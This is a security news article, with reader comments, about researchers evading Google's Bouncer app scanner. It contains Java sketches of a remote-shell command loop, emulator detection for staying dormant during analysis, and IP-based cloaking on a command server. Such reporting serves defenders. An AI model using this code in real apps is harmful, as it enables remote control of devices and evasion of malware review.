Google’s Android platform has become the most popular mobile operating system among both consumers and malware writers, and the company earlier this year introduced the Bouncer system to look for malicious apps in the Google Play market. Bouncer, which checks submissions for malicious behavior and known malware, is a good first step, but as new work from researchers Jon Oberheide and Charlie Miller shows, it can be bypassed quite easily, and in ways that will be difficult for Google to address in the long term.

Oberheide and Miller, both well-known for their work on mobile security, went into their research without much detailed knowledge of how the Bouncer system works. Google has said little publicly about its capabilities, preferring not to give attackers any insights into the system’s inner workings. So Oberheide and Miller looked at it as a challenge, an exercise to see how much they could deduce about Bouncer from the outside, and, as it turns out, the inside.

“The problem that Bouncer faces is very similar to the problems that normal antivirus analysts face. Malware will fingerprint the system it’s on to see whether it’s running in a virtualized environment or in an emulator,” Oberheide said. “Bouncer was designed by people I know really well, and I wanted to see how they’d design a system. It was a total black-box approach for us, to see how much we could learn by submitting apps and poking around.”

Oberheide and Miller set up some fake Google accounts and began submitting apps to Google Play, the new name for what was originally called the Android Market. They wanted to get a sense of the kind of environment Google uses to analyze apps, identify the system’s weak spots and then look for ways to exploit them to bypass Bouncer entirely. One of the apps they submitted contained functionality that, once inside the Bouncer environment, called out to a server the researchers controlled. The app gave them a remote shell on the system and the ability to issue commands and watch what was happening as Bouncer analyzed the app.
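The call-home behavior the researchers describe can be sketched as a simple command loop: read a command from the operators' server, run it, and send the output back. This is a minimal illustrative sketch, not the researchers' actual code; the class name, the `__done__` marker, and the line-based protocol are all assumptions. The loop is factored over ordinary streams so it can be exercised without a network connection; in a real app, `in` and `out` would wrap a socket to the command-and-control server.

```java
import java.io.*;

// Hypothetical sketch of a call-home remote shell: read commands from
// the operator, execute them, and stream the output back.
class CallHome {
    static void handleSession(BufferedReader in, PrintWriter out) {
        try {
            String cmd;
            while ((cmd = in.readLine()) != null) {
                if (cmd.equals("exit")) return;   // operator closes the session
                // Run the command and relay its standard output.
                Process p = Runtime.getRuntime().exec(cmd.split(" "));
                try (BufferedReader pr = new BufferedReader(
                        new InputStreamReader(p.getInputStream()))) {
                    String line;
                    while ((line = pr.readLine()) != null) out.println(line);
                }
                out.println("__done__");   // marker: command finished
                out.flush();
            }
        } catch (IOException e) {
            out.println("error: " + e.getMessage());
            out.flush();
        }
    }
}
```

With a hook like this inside the analysis environment, the operators can poke around interactively, which is exactly how the researchers profiled Bouncer from the inside.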

The researchers quickly noticed that their app was running inside an emulator. That gave them data they could use in future submissions: an app can check for those telltale signs and hide its malicious functionality whenever it discovers it’s running in such an environment.
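Fingerprinting of this kind can be as simple as checking a few build properties. The sketch below is a hypothetical example, not the researchers' actual checks: the "generic" fingerprint prefix and the "goldfish" hardware name are well-known giveaways of the stock Android emulator. On a device, the arguments would come from `android.os.Build` (`Build.FINGERPRINT`, `Build.MODEL`, `Build.HARDWARE`); they are passed in as plain strings here so the heuristic runs anywhere.

```java
// Hypothetical emulator-detection heuristic. A malicious app could call
// this before doing anything suspicious and stay dormant if it matches.
class EmulatorCheck {
    static boolean looksLikeEmulator(String fingerprint, String model, String hardware) {
        return fingerprint.startsWith("generic")   // stock emulator builds
            || model.contains("sdk")               // e.g. "sdk", "google_sdk"
            || "goldfish".equals(hardware);        // classic QEMU emulator kernel
    }
}
```

Checks like these are trivial to write, which is why Oberheide notes that hardening the analysis environment against fingerprinting is a long-term arms race rather than a one-time fix.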

“It’s pretty trivial for us to bypass now, but I’m sure Google will make changes,” said Oberheide, who will be presenting the findings, along with Miller, at Summercon later this week. “It’ll never be perfect, but hopefully they’ll sweep up a lot of the crap malware with it. But malware authors share code widely and collaborate, so I wouldn’t be surprised if they have a library soon to help bypass Bouncer that you’ll see in a bunch of malicious apps.”

Oberheide produced a video that shows the fake app he and Miller developed calling back and responding to commands from inside the Bouncer environment. 

By looking at the traffic coming into the command-and-control server they had set up, the researchers could see that all of the requests originated from a single Google IP block, something an attacker could easily identify. Google could change that IP block, Oberheide said, but to hide the analysis traffic effectively the company would need to acquire IP space from a variety of providers and route traffic through those blocks.
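One way an attacker could exploit that single source block: have the command-and-control server compare each client address against the known range and serve only benign behavior to matches. The following is an illustrative sketch of the range check; the `192.0.2.0/24` block is a documentation placeholder, not Google's actual range, and the class and method names are hypothetical.

```java
// Hypothetical server-side gate: decide whether a connecting client
// falls inside a known analysis-infrastructure CIDR block.
class IpGate {
    // Parse a dotted-quad IPv4 address into a 32-bit int.
    static int toInt(String ip) {
        String[] o = ip.split("\\.");
        return (Integer.parseInt(o[0]) << 24) | (Integer.parseInt(o[1]) << 16)
             | (Integer.parseInt(o[2]) << 8)  |  Integer.parseInt(o[3]);
    }

    // True if ip falls inside the given CIDR block, e.g. "192.0.2.0/24".
    static boolean inBlock(String ip, String cidr) {
        String[] parts = cidr.split("/");
        int prefix = Integer.parseInt(parts[1]);
        int mask = prefix == 0 ? 0 : -1 << (32 - prefix);
        return (toInt(ip) & mask) == (toInt(parts[0]) & mask);
    }
}
```

A C2 server using a check like `IpGate.inBlock(clientAddr, "192.0.2.0/24")` could send harmless responses to the analysis block and malicious payloads to everyone else, which is why spreading the analysis traffic across many providers matters.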

Oberheide also said that he and Miller were caught a few times during their research.

“We were a little overzealous and didn’t take many precautions at the beginning,” Oberheide said. “We wanted to see what it took to get caught. Some of them were blatant, like capturing a lot of data and sending it back out. We saw some follow-up from them that looked to be manual. It came from a Google IP address, but not in the Bouncer block. We got caught when our app was calling back to a server I run, but we got stealthier after that.”

Another interesting thing that Oberheide and Miller noticed is that it’s possible to upload apps to the system and have them analyzed by Bouncer without a valid credit card or account. So malware authors could try various tactics in their apps and see whether they’re successful without needing to burn a stolen card. 

The researchers have talked with Google about the general outline of their findings and Oberheide said he expects the company to respond, but that the larger problem with Bouncer will be difficult to solve.

“These issues are non-trivial to fix. They can knock off a few of the easier ones, but it’s a long-term problem,” he said.

Categories: Mobile Security

Comments (8)

  1. Anonymous

    iOS is dying; the front-runner in a niche is hardly ever the long-distance runner.

  2. Anonymous

    Interesting that the Android analysis is dynamic – they are running the code. I believe that nearly all, if not all, of the Apple validation is done through static analysis of the object code. They are looking at what API functions are called, and that is about it. The allowed functionality is restricted enough that it is extraordinarily difficult to get anything through that should not be there.

    I would think there would be good points to dynamic analysis, but the clear risk is that the application can make decisions about what to invoke and what not to. This means path analysis will not get you 100% coverage no matter what you do.

    I’d say static analysis would be a clear winner as long as you can restrict things sufficiently. For example, allowing code to be downloaded and executed in any manner is clearly a no-no. I do not believe this is possible with iOS without playing all sorts of games, most of which stand out in static analysis and will just get the application banned. I believe there was an exposure for this early on, but it is gone now, or at least much tighter. I don’t know enough about Android to say how hard that might be there, but I understand existing malware has been doing it.

  3. Anonymous

    I don’t see how this circumvention effort is any more sophisticated than writing your code to delay any malicious operations for, say, 30 days after you submit it and it gets approval. If Google isn’t examining the code to see if it’s looking for a test account, then they probably wouldn’t notice a timebomb, either.

  4. Anonymous

    Downloading and running code is in the eye of the beholder.

    If my program is a “virtual machine” that does nothing but display letters and numbers, and it is “programmed” by reading input from a file, I think Apple would take it. Especially if I called it a text-file reader, which, after all, is what most people would call it.

    On the other hand, if I called my program a “java bytecode dynamic analysis tool” instead of a “java virtual machine,” like most people would call it, I hope Apple would see past my “point of view” that my program is “just” reading in a data file.

    Bottom line: The distinction between code and data, between virtual machine and non-VM, is one of human semantics; many computer programs are both VM and non-VM, and many files are both code and data, depending entirely on the point of view of the person using the program.


Comments are closed.